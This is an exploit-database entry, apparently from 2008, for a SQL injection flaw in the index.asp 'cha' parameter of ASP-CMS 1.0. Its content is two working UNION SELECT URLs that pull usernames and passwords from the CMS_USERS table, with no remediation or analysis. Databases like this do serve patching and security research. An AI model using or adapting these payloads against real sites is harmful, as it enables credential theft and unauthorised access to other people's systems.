id: 4424
date: 12/12/2008
title: ASP-CMS 1.0 (index.asp cha) SQL Injection Vulnerability
author: IRCRASH
cves: 

=======================================================
ASP-CMS 1.0 (index.asp cha) SQL Injection Vulnerability
=======================================================


#####################################################################################
####                        ASP-CMS v.1.0 Sql Injection                          ####
#####################################################################################
#                                                                                   #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#####################################################################################
#                                                                                   #
#Download : http://puzzle.dl.sourceforge.net/sourceforge/asp-cms/asp-cms.18-12-04.zip
#                                                                                   #
#DORK : :(                                                                          #
#                                                                                   #
#####################################################################################
#                                 [Sql Injection]                                   #
#                                                                                   #
#Username : http://Site/[path]/index.asp?cha=-999%20union%20select%200,1,user_username,3,4,5,6,7,8,9,10%20from%20CMS_USERS
#                                                                                   #
#Password : http://Site/[path]/index.asp?cha=-999%20union%20select%200,1,user_password,3,4,5,6,7,8,9,10%20from%20CMS_USERS
#                                                                                   #
#####################################################################################



#  0day.today [2023-03-22]  #